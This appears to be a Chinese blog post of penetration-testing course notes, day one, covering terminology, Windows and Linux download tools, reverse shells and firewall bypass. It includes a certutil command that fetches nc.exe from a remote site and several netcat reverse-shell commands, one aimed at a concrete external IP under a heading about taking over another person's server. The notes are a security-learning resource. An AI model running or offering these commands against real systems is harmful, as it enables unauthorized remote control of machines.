

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="j0ker">
  <meta name="keywords" content="">
  
    <meta name="description" content="第一天：基础入门-操作系统&amp;名词&amp;文件下载&amp;反弹SHELL&amp;防火墙绕过​                          12345678910111213#知识点：1、名词解释-渗透测试-漏洞&amp;攻击&amp;后门&amp;代码&amp;专业词2、必备技能-操作系统-用途&amp;命令&amp;权限&amp;用户&amp;防火墙3、必备技能-文件下载-缘由">
<meta property="og:type" content="article">
<meta property="og:title" content="day01">
<meta property="og:url" content="http://example.com/2022/01/11/day01/index.html">
<meta property="og:site_name" content="j0ker&#39;s blog">
<meta property="og:description" content="第一天：基础入门-操作系统&amp;名词&amp;文件下载&amp;反弹SHELL&amp;防火墙绕过​                          12345678910111213#知识点：1、名词解释-渗透测试-漏洞&amp;攻击&amp;后门&amp;代码&amp;专业词2、必备技能-操作系统-用途&amp;命令&amp;权限&amp;用户&amp;防火墙3、必备技能-文件下载-缘由">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/cover/15.jpg">
<meta property="article:published_time" content="2022-01-11T06:36:00.000Z">
<meta property="article:modified_time" content="2022-01-14T13:23:36.704Z">
<meta property="article:author" content="j0ker">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/cover/15.jpg">
  
  
  <title>day01 - j0ker&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>j0ker&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="day01">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-01-11 14:36" pubdate>
        2022年1月11日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.9k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      25 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">day01</h1>
            
            <div class="markdown-body">
              <h2 id="第一天：基础入门-操作系统-amp-名词-amp-文件下载-amp-反弹SHELL-amp-防火墙绕过"><a href="#第一天：基础入门-操作系统-amp-名词-amp-文件下载-amp-反弹SHELL-amp-防火墙绕过" class="headerlink" title="第一天：基础入门-操作系统&amp;名词&amp;文件下载&amp;反弹SHELL&amp;防火墙绕过"></a>第一天：基础入门-操作系统&amp;名词&amp;文件下载&amp;反弹SHELL&amp;防火墙绕过</h2><p>​                 <img src="/2022/01/11/day01/image-20220114212245566.png" srcset="/img/loading.gif" lazyload class="" title="image-20220114212245566">        </p>
<figure class="highlight tex"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></div></td><td class="code"><pre><code class="hljs tex"><span class="hljs-params">#</span>知识点：<br>1、名词解释-渗透测试-漏洞<span class="hljs-built_in">&amp;</span>攻击<span class="hljs-built_in">&amp;</span>后门<span class="hljs-built_in">&amp;</span>代码<span class="hljs-built_in">&amp;</span>专业词<br>2、必备技能-操作系统-用途<span class="hljs-built_in">&amp;</span>命令<span class="hljs-built_in">&amp;</span>权限<span class="hljs-built_in">&amp;</span>用户<span class="hljs-built_in">&amp;</span>防火墙<br>3、必备技能-文件下载-缘由<span class="hljs-built_in">&amp;</span>场景<span class="hljs-built_in">&amp;</span>使用-提权<span class="hljs-built_in">&amp;</span>后渗透<br>4、必备技能-反弹命令-缘由<span class="hljs-built_in">&amp;</span>场景<span class="hljs-built_in">&amp;</span>使用-提权<span class="hljs-built_in">&amp;</span>后渗透<br><br>前后端，POC/EXP，Payload/Shellcode，后门/Webshell，木马/病毒，<br>反弹，回显，跳板，黑白盒测试，暴力破解，社会工程学，撞库，ATT<span class="hljs-built_in">&amp;</span>CK等<br>参考：<br>https://www.cnblogs.com/sunny11/p/13583083.html<br>https://forum.ywhack.com/bountytips.php?download<br>https://forum.ywhack.com/reverse-shell/<br>https://blog.csdn.net/weixin<span class="hljs-built_in">_</span>43303273/article/details/83029138<br></code></pre></td></tr></table></figure>

<hr>
<p>演示案例：</p>
<ul>
<li>基础案例1：操作系统-用途&amp;命令&amp;权限&amp;用户&amp;防火墙</li>
<li>实用案例1：文件上传下载-解决无图形化&amp;解决数据传输</li>
<li>实用案例2：反弹Shell命令-解决数据回显&amp;解决数据通讯</li>
<li>结合案例1：防火墙绕过-正向连接&amp;反向连接&amp;内网服务器</li>
<li>结合案例2：学会了有手就行-Fofa拿下同行Pikachu服务器</li>
</ul>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs tex"><span class="hljs-params">#</span>基础案例1：操作系统-用途<span class="hljs-built_in">&amp;</span>命令<span class="hljs-built_in">&amp;</span>权限<span class="hljs-built_in">&amp;</span>用户<span class="hljs-built_in">&amp;</span>防火墙<br>1、个人计算机<span class="hljs-built_in">&amp;</span>服务器用机<br>2、Windows<span class="hljs-built_in">&amp;</span>Linux常见命令<br>3、文件权限<span class="hljs-built_in">&amp;</span>服务权限<span class="hljs-built_in">&amp;</span>用户权限等<br>4、系统用户<span class="hljs-built_in">&amp;</span>用户组<span class="hljs-built_in">&amp;</span>服务用户等分类<br>5、自带防火墙出站<span class="hljs-built_in">&amp;</span>入站规则策略协议<br><br><span class="hljs-params">#</span>实用案例1：文件上传下载-解决无图形化<span class="hljs-built_in">&amp;</span>解决数据传输<br>Linux：wget curl python ruby perl java等<br>Windows：PowerShell Certutil Bitsadmin msiexec mshta rundll32等<br><br><span class="hljs-params">#</span>实用案例2：反弹Shell命令-解决数据回显<span class="hljs-built_in">&amp;</span>解决数据通讯<br>useradd 用户名 passwd 用户名<br>测试Linux系统添加用户或修改密码命令交互回显问题<br><br><span class="hljs-params">#</span>结合案例1：防火墙绕过-正向连接<span class="hljs-built_in">&amp;</span>反向连接<span class="hljs-built_in">&amp;</span>内网服务器<br>1、内网：<br>内网 -&gt; xiaodi8<br>xiaodi8 !-&gt; 内网<br>2、防火墙：<br>xiaodi8 &lt;-&gt; aliyun<br>xiaodi8防火墙 -&gt; aliyun<br>aliyun !-&gt; xiaodi8防火墙<br><br><span class="hljs-params">#</span>结合案例2：学会了有手就行-Fofa拿下同行Pikachu服务器<br>文件下载<span class="hljs-built_in">&amp;</span>反弹Shell:<br>certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe nc.exe<br>nc -e cmd 47.75.212.155 5566<br></code></pre></td></tr></table></figure>

<hr>
<p>涉及资源：</p>
<p><a target="_blank" rel="noopener" href="https://docs.qq.com/doc/DQ3Z6RkNpaUtMcEFr">补充：涉及录像课件资源软件包资料等下载地址</a></p>
<hr>
<h3 id="0x01-渗透测试专用术语"><a href="#0x01-渗透测试专用术语" class="headerlink" title="0x01 渗透测试专用术语"></a>0x01 渗透测试专用术语</h3><p>参考链接：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/sunny11/p/13583083.html">https://www.cnblogs.com/sunny11/p/13583083.html</a></p>
<h3 id="0x02-棱角下载命令生成"><a href="#0x02-棱角下载命令生成" class="headerlink" title="0x02 棱角下载命令生成"></a>0x02 棱角下载命令生成</h3><p>参考链接 ：<a target="_blank" rel="noopener" href="https://forum.ywhack.com/bountytips.php?download">https://forum.ywhack.com/bountytips.php?download</a></p>
<p>这里get到了一个新的网站 (技术交流)</p>
<p>棱角安全团队技术论坛：<a target="_blank" rel="noopener" href="https://forum.ywhack.com/">https://forum.ywhack.com/</a></p>
<h3 id="0x03-渗透测试中常用的命令"><a href="#0x03-渗透测试中常用的命令" class="headerlink" title="0x03 渗透测试中常用的命令"></a>0x03 渗透测试中常用的命令</h3><p>参考链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43303273/article/details/83029138">https://blog.csdn.net/weixin_43303273/article/details/83029138</a></p>
<p>这里get到了一个新的网站( GBHackers安全社区)</p>
<p><a target="_blank" rel="noopener" href="https://gbhackers.com/category/pentesting/">PENTESTING Archives - GBHackers On Security</a></p>
<p><strong>1.linux命令</strong></p>
<p>渗透测试中常用的linux命令<br>上面博客提到的基本都能满足需求<br><strong>2.cmd命令</strong></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/air-of-code/p/6015590.html">常用的cmd命令</a></p>
<p>cmd命令和linux命令常用的对于web入门的萌新可以看看上面博客，多敲一敲用的时候查就行了<br><strong>3.powershell</strong></p>
<p>Windows PowerShell 是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。<br>它引入了许多非常有用的新概念，从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。<br>对于powershell，需要去学习，这里有三篇比较实用于渗透测试的文章，是我的好友香山<a target="_blank" rel="noopener" href="https://rootclay.github.io/">ROOTCLAY博客</a>师傅在安全客发表的三篇文章，详细全面<br><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/87976">Powershell攻击指南黑客后渗透之道系列——基础篇</a><br><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/88851">Powershell攻击指南黑客后渗透之道系列——进阶利用</a><br><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/89362">Powershell攻击指南黑客后渗透之道系列——实战篇</a></p>
<p>命令需要大家自己多去用一用就会熟悉</p>
<h4 id="0x04-反弹shell的使用"><a href="#0x04-反弹shell的使用" class="headerlink" title="0x04 反弹shell的使用"></a>0x04 反弹shell的使用</h4><figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs tex">什么是反弹shell？<br><br>　　反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse  shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。<br><br>为什么要反弹shell？<br><br>通常用于被控端因防火墙受限、权限不足、端口被占用等情形。<br><br>举例：假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢？<br><br>有如下情况：<br><br>1.某客户机中了你的网马，但是它在局域网内，你直接连接不了。 <br><br>2.目标机器的ip动态改变，你不能持续控制。<br><br>3.由于防火墙等限制，对方机器只能发送请求，不能接收请求。<br><br>4.对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机等情况都是未知的，所以建立一个服务端让恶意程序主动连接，才是上策。<br><br>那么反弹就很好理解了，攻击者指定服务端，受害者主机主动连接攻击者的服务端程序，就叫反弹连接。<br><br>参考于https://zhuanlan.zhihu.com/p/138393396<br></code></pre></td></tr></table></figure>

<p>在控制机上开启监听</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">nc -lvvp 5566<br></code></pre></td></tr></table></figure>

<p>(1)在被控机上(windows)开启正向连接(nc)</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">nc -e cmd 控制机ip 控制机端口<br></code></pre></td></tr></table></figure>

<p>(2)在被控机上(linux)开启正向连接(nc)</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">nc -e /bin/sh 控制机ip 控制机端口<br></code></pre></td></tr></table></figure>

<p>这里需要注意，很多软件命令可以造成反弹shell，详见参考 <a target="_blank" rel="noopener" href="https://forum.ywhack.com/shell.php">https://forum.ywhack.com/shell.php</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/">小迪安全</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/01/12/day21/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">day21</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/01/11/day20/">
                        <span class="hidden-mobile">day20-php安全特性学习</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        赣ICP证2021009463号
      </a>
    </span>
    
      
        <span>
          <a
            href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=2021009463"
            rel="nofollow noopener"
            class="beian-police"
            target="_blank"
          >
            
              <span style="visibility: hidden; width: 0">|</span>
              <img src="/img/police_beian.png" srcset="/img/loading.gif" lazyload alt="police-icon"/>
            
            <span>赣ICP备2021009463号</span>
          </a>
        </span>
      
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
